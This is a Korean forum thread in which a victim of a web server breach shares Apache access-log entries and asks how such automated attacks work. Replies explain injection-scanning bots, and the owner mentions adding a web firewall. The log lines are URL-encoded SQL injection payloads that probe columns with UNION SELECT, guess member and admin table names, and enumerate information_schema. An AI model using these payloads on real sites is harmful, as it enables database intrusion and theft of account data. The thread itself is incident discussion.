서버 해킹을 당했습니다. 혹시 이렇게 자동으로 해킹해주는 툴이 있나요?
사이트 주소에 get 파라미터를 바꿔가며 테이블 스키마와 계정 정보를 빼 내어 간것 같습니다.
아파치 접속 로그인데
혹시 이렇게 자동으로 해킹해 주는 툴이 있나요?
idx=21%20UNION%20ALL%20SELECT%20null,null,null,null,null,null,null,null%20from%20msdb..backupfile-- HTTP/1.1" 200 13175
idx=21%20UNION%20ALL%20SELECT%20null,null,null,null,null,null,null,null%20from%20mysql.db-- HTTP/1.1" 200 13175
idx=21%20and%200%3C=(select%20count(*)%20from%20tbladmin)%20and%201=1 HTTP/1.1" 200 13175
idx=-999.9%20UNION%20ALL%20SELECT%20concat(0x7e,0x27,0x7233646D3076335F73716C5F696E6A656374696F6E,0x27,0x7e),2,3,4,5,6,7,8-- HTTP/1.1" 200 13178
idx=-999.9%20UNION%20ALL%20SELECT%201,concat(0x7e,0x27,0x7233646D3076335F73716C5F696E6A656374696F6E,0x27,0x7e),3,4,5,6,7,8-- HTTP/1.1" 200 13178
idx=21%20and%200%3C=(select%20count(*)%20from%20member_list)%20and%201=1 HTTP/1.1" 200 13175
idx=-999.9%20UNION%20ALL%20SELECT%201,2,concat(0x7e,0x27,0x7233646D3076335F73716C5F696E6A656374696F6E,0x27,0x7e),4,5,6,7,8-- HTTP/1.1" 200 13178
idx=-999.9%20UNION%20ALL%20SELECT%201,2,3,concat(0x7e,0x27,0x7233646D3076335F73716C5F696E6A656374696F6E,0x27,0x7e),5,6,7,8-- HTTP/1.1" 200 13178
idx=-999.9%20UNION%20ALL%20SELECT%201,2,3,4,concat(0x7e,0x27,0x7233646D3076335F73716C5F696E6A656374696F6E,0x27,0x7e),6,7,8-- HTTP/1.1" 200 13202
idx=21%20and%200%3C=(select%20count(*)%20from%20members_list)%20and%201=1 HTTP/1.1" 200 13175
idx=-999.9%20UNION%20ALL%20SELECT%201,2,3,4,concat(0x7e,0x27,Hex(cast(database()%20as%20char)),0x27,0x7e),6,7,8-- HTTP/1.1" 200 13197
idx=21%20and%200%3C=(select%20count(*)%20from%20members_info)%20and%201=1 HTTP/1.1" 200 13175
idx=21%20and%200%3C=(select%20count(*)%20from%20member_info)%20and%201=1 HTTP/1.1" 200 13175
idx=21%20and%200%3C=(select%20count(*)%20from%20g_member)%20and%201=1 HTTP/1.1" 200 13175
idx=21%20and%200%3C=(select%20count(*)%20from%20g_members)%20and%201=1 HTTP/1.1" 200 13175
idx=21%20and%200%3C=(select%20count(*)%20from%20a_member)%20and%201=1 HTTP/1.1" 200 13175
idx=21%20and%200%3C=(select%20count(*)%20from%20a_user)%20and%201=1 HTTP/1.1" 200 13175
idx=21%20and%200%3C=(select%20count(*)%20from%20b_member)%20and%201=1 HTTP/1.1" 200 13175
idx=21%20and%200%3C=(select%20count(*)%20from%20b_user)%20and%201=1 HTTP/1.1" 200 13175
idx=21%20and%200%3C=(select%20count(*)%20from%20c_user)%20and%201=1 HTTP/1.1" 200 13175
idx=21%20and%200%3C=(select%20count(*)%20from%20c_member)%20and%201=1 HTTP/1.1" 200 13175
..
idx=-999.9%20UNION%20ALL%20SELECT%201,2,3,4,(SELECT%20concat(0x7e,0x27,count(table_name),0x27,0x7e)%20FROM%20information_schema.tables%20WHERE%20table_schema=0x6D70726F6A656374),6,7,8-- HTTP/1.1" 200 13175
idx=21%20and%200%3C=(select%20count(*)%20from%20l_user)%20and%201=1 HTTP/1.1" 200 13175
idx=-999.9%20UNION%20ALL%20SELECT%201,2,3,4,(select%20concat(0x7e,0x27,Hex(cast(group_concat(table_name)%20as%20char)),0x27,0x7e)%20FROM%20information_schema.tables%20Where%20table_schema=0x6D70726F6A656374),6,7,8-- HTTP/1.1" 200 13175
당한 웹
당한 웹 애플리케이션이 뭔가요?
아파치 입니다.
아파치 입니다. APM 환경입니다.
injection이 가능한지
injection이 가능한지 체크하는 bot은 널렸습니다. 즉.. 요즘은 거의 돌아다니고 있다고 봐야 합니다. injection이 가능하다고 판단되는 URL을 침입자에게 noti하고 침입자가 해당 사이트를 공격하는 것이 패턴입니다.
즉.. 내 사이트가 유명하지 않다고 설마 뚫리겠어 하는 것은 이젠 위험한 발상이 되는 것이죠. 검색 엔진에 내 사이트가 나온다면 공격을 받을 수 있는 확률이 있다고 보시면 됩니다.
KLDP 서버만 해도 injection attack 시도가 엄청나게 들어옵니다. 실제로 얼마전 kldp 에서 지원하는 wordpress로 운영되는 사이트가 cracking 당했지만, PHP engine에서 패치해 놓은 사항으로 막아 내기는 했습니다만, 언제 어떻게 뚫릴지는 아무도 모르죠. :-)
조언 감사합니다.
조언 감사합니다.
이번일 당하고 나서 웹 방화벽을 처음 깔아 봤네요.
전화위복의 기회로 삼아야겠습니다.
감사합니다.
댓글 달기